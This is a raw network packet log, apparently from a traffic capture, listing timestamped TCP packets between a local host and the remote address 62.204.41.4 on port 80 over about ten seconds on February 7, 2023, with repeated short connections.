Feb 7, 2023 20:02:38.557179928 CET	50094	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.558420897 CET	50095	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.618642092 CET	80	50094	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.618810892 CET	50094	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.619911909 CET	80	50095	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.620074987 CET	50095	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.620537043 CET	50095	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.682223082 CET	80	50095	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.684617043 CET	80	50095	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.684906006 CET	50095	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.796907902 CET	50095	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.798121929 CET	50096	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.861043930 CET	80	50095	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.861080885 CET	80	50096	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.861366987 CET	50095	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.861469984 CET	50096	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.862015009 CET	50096	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.923660994 CET	80	50096	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.926625967 CET	80	50096	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.926816940 CET	50096	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.035871029 CET	50096	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.036912918 CET	50097	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.097769976 CET	80	50096	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.098033905 CET	50096	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.098912001 CET	80	50097	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.099124908 CET	50097	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.099670887 CET	50097	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.161464930 CET	80	50097	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.165566921 CET	80	50097	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.168896914 CET	50097	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.273519039 CET	50097	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.274678946 CET	50098	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.335244894 CET	80	50098	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.335303068 CET	80	50097	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.335674047 CET	50097	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.336688995 CET	50098	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.366200924 CET	50098	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.426573992 CET	80	50098	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.429116011 CET	80	50098	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.435017109 CET	50098	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.595877886 CET	50098	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.596784115 CET	50099	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.656229019 CET	80	50098	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.657062054 CET	80	50099	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.661703110 CET	50098	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.661775112 CET	50099	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.663651943 CET	50099	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.723893881 CET	80	50099	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.726768970 CET	80	50099	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.727508068 CET	50099	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.838912964 CET	50099	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.839968920 CET	50100	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.899430990 CET	80	50099	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.899766922 CET	50099	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.900686979 CET	80	50100	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.900835991 CET	50100	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.901405096 CET	50100	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:39.961996078 CET	80	50100	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.964401960 CET	80	50100	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:39.964534044 CET	50100	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.083781958 CET	50100	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.084697962 CET	50101	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.145539045 CET	80	50100	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:40.147770882 CET	80	50101	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:40.153162003 CET	50100	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.153269053 CET	50101	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.156172991 CET	50101	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.219674110 CET	80	50101	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:40.222395897 CET	80	50101	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:40.222912073 CET	50101	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.355489016 CET	50101	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.356520891 CET	50102	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.418612957 CET	80	50101	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:40.420978069 CET	80	50102	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:40.426450968 CET	50101	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.426557064 CET	50102	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.427299976 CET	50102	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.490894079 CET	80	50102	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:40.495271921 CET	80	50102	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:40.497036934 CET	50102	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.618889093 CET	50102	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.619868994 CET	50103	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.684916973 CET	80	50102	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:40.684951067 CET	80	50103	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:40.685172081 CET	50102	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.685173988 CET	50103	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.685700893 CET	50103	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.750866890 CET	80	50103	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:40.756908894 CET	80	50103	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:40.757391930 CET	50103	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.883327961 CET	50103	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.884516954 CET	50104	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.945772886 CET	80	50103	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:40.947083950 CET	80	50104	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:40.947340965 CET	50103	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.947400093 CET	50104	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:40.952137947 CET	50104	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.014950037 CET	80	50104	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.018984079 CET	80	50104	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.020795107 CET	50104	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.134603024 CET	50104	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.135598898 CET	50105	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.197228909 CET	80	50104	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.197276115 CET	80	50105	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.197345018 CET	50104	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.197479010 CET	50105	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.198188066 CET	50105	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.259643078 CET	80	50105	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.265789032 CET	80	50105	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.266938925 CET	50105	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.383423090 CET	50105	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.384450912 CET	50106	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.444986105 CET	80	50105	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.445034027 CET	80	50106	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.449057102 CET	50105	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.449181080 CET	50106	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.451184034 CET	50106	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.511910915 CET	80	50106	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.514235973 CET	80	50106	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.514487982 CET	50106	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.625202894 CET	50106	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.626084089 CET	50107	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.685615063 CET	80	50107	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.685832977 CET	80	50106	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.685851097 CET	50107	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.685935974 CET	50106	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.686559916 CET	50107	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.745909929 CET	80	50107	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.748126984 CET	80	50107	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.749964952 CET	50107	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.868673086 CET	50107	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.869735956 CET	50108	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.928420067 CET	80	50107	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.928610086 CET	50107	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.931301117 CET	80	50108	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.931512117 CET	50108	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.932132959 CET	50108	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:41.993782043 CET	80	50108	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.996509075 CET	80	50108	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:41.996684074 CET	50108	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.101294994 CET	50108	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.111917973 CET	50109	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.162868023 CET	80	50108	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.162997007 CET	50108	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.171386957 CET	80	50109	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.172125101 CET	50109	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.172518969 CET	50109	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.231833935 CET	80	50109	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.235604048 CET	80	50109	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.236140013 CET	50109	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.355463982 CET	50109	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.356409073 CET	50110	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.414971113 CET	80	50109	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.415190935 CET	50109	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.416892052 CET	80	50110	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.417058945 CET	50110	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.417577982 CET	50110	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.478133917 CET	80	50110	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.481040955 CET	80	50110	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.481158972 CET	50110	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.588707924 CET	50110	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.589854002 CET	50111	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.649287939 CET	80	50110	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.649532080 CET	50110	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.650399923 CET	80	50111	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.650552988 CET	50111	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.651134014 CET	50111	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.711559057 CET	80	50111	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.713891029 CET	80	50111	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.715518951 CET	50111	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.824531078 CET	50111	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.825273991 CET	50112	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.885284901 CET	80	50111	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.885495901 CET	50111	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.887933969 CET	80	50112	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.895123005 CET	50112	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.895839930 CET	50112	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:42.958451986 CET	80	50112	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.960836887 CET	80	50112	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:42.967600107 CET	50112	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.071857929 CET	50112	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.072877884 CET	50113	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.133773088 CET	80	50113	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.134095907 CET	50113	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.134587049 CET	50113	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.134630919 CET	80	50112	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.134804964 CET	50112	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.195411921 CET	80	50113	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.199352026 CET	80	50113	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.201935053 CET	50113	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.331134081 CET	50113	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.331821918 CET	50114	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.392267942 CET	80	50113	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.393779993 CET	80	50114	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.401401043 CET	50113	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.401494980 CET	50114	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.402147055 CET	50114	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.463670015 CET	80	50114	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.466646910 CET	80	50114	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.466933012 CET	50114	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.575198889 CET	50114	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.576426983 CET	50115	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.636713982 CET	80	50114	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.636892080 CET	50114	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.637703896 CET	80	50115	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.637873888 CET	50115	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.638524055 CET	50115	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.700469017 CET	80	50115	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.702280045 CET	80	50115	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.702363014 CET	50115	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.834547043 CET	50115	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.835700989 CET	50116	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.896092892 CET	80	50115	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.896178961 CET	50115	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.898129940 CET	80	50116	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.898447990 CET	50116	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.899560928 CET	50116	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:43.962162971 CET	80	50116	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.965069056 CET	80	50116	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:43.965261936 CET	50116	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.093024969 CET	50116	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.093866110 CET	50117	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.154310942 CET	80	50117	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.154465914 CET	50117	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.155621052 CET	80	50116	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.155731916 CET	50116	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.156964064 CET	50117	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.217766047 CET	80	50117	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.221028090 CET	80	50117	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.221199989 CET	50117	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.339502096 CET	50117	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.340301037 CET	50118	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.400120974 CET	80	50117	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.400235891 CET	50117	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.400774956 CET	80	50118	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.400926113 CET	50118	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.402579069 CET	50118	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.463231087 CET	80	50118	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.465873003 CET	80	50118	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.466068983 CET	50118	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.581347942 CET	50118	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.582110882 CET	50119	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.642008066 CET	80	50118	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.642147064 CET	50118	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.643652916 CET	80	50119	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.643831015 CET	50119	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.644393921 CET	50119	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.706048965 CET	80	50119	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.708594084 CET	80	50119	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.708710909 CET	50119	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.834856987 CET	50119	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.835901022 CET	50120	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.896588087 CET	80	50119	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.896703005 CET	50119	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.897556067 CET	80	50120	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.897691965 CET	50120	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.901957989 CET	50120	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:44.963665009 CET	80	50120	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.966161013 CET	80	50120	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:44.966303110 CET	50120	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.078435898 CET	50120	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.079111099 CET	50121	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.140388966 CET	80	50120	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.140542984 CET	80	50121	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.140552044 CET	50120	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.140656948 CET	50121	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.141107082 CET	50121	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.202491999 CET	80	50121	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.206444025 CET	80	50121	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.207845926 CET	50121	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.324316025 CET	50121	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.325378895 CET	50122	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.387048960 CET	80	50121	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.387295008 CET	50121	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.388715982 CET	80	50122	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.388922930 CET	50122	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.389627934 CET	50122	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.452227116 CET	80	50122	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.454247952 CET	80	50122	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.455935955 CET	50122	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.574395895 CET	50122	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.575284958 CET	50123	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.636085987 CET	80	50123	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.636923075 CET	80	50122	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.637219906 CET	50122	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.637259960 CET	50123	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.637794971 CET	50123	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.698326111 CET	80	50123	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.702547073 CET	80	50123	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.702644110 CET	50123	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.824069977 CET	50123	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.825303078 CET	50124	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.884835005 CET	80	50123	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.884998083 CET	50123	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.888027906 CET	80	50124	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.889442921 CET	50124	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.914006948 CET	50124	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:45.976787090 CET	80	50124	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.979562998 CET	80	50124	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:45.981411934 CET	50124	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:46.362128019 CET	50124	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:46.363142014 CET	50125	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:46.425775051 CET	80	50125	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:46.425811052 CET	80	50124	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:46.426067114 CET	50124	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:46.426076889 CET	50125	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:46.439462900 CET	50125	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:46.501174927 CET	80	50125	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:46.504683971 CET	80	50125	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:46.504884005 CET	50125	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:46.642873049 CET	50125	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:46.644028902 CET	50126	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:46.704596996 CET	80	50126	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:46.704830885 CET	50126	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:46.704859018 CET	80	50125	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:46.704937935 CET	50125	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:46.754868984 CET	50126	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:46.815412045 CET	80	50126	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:46.818093061 CET	80	50126	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:46.818280935 CET	50126	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:46.975929022 CET	50126	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:46.977257967 CET	50127	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:47.036432981 CET	80	50126	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:47.036612988 CET	50126	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:47.037924051 CET	80	50127	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:47.038110018 CET	50127	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:47.079663992 CET	50127	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:47.140412092 CET	80	50127	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:47.145004034 CET	80	50127	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:47.145172119 CET	50127	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.039994001 CET	50127	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.100727081 CET	80	50127	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:48.100931883 CET	50127	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.144263983 CET	50128	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.205698013 CET	80	50128	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:48.205928087 CET	50128	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.244683027 CET	50128	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.305977106 CET	80	50128	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:48.310873032 CET	80	50128	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:48.311146021 CET	50128	80	192.168.2.6	62.204.41.4
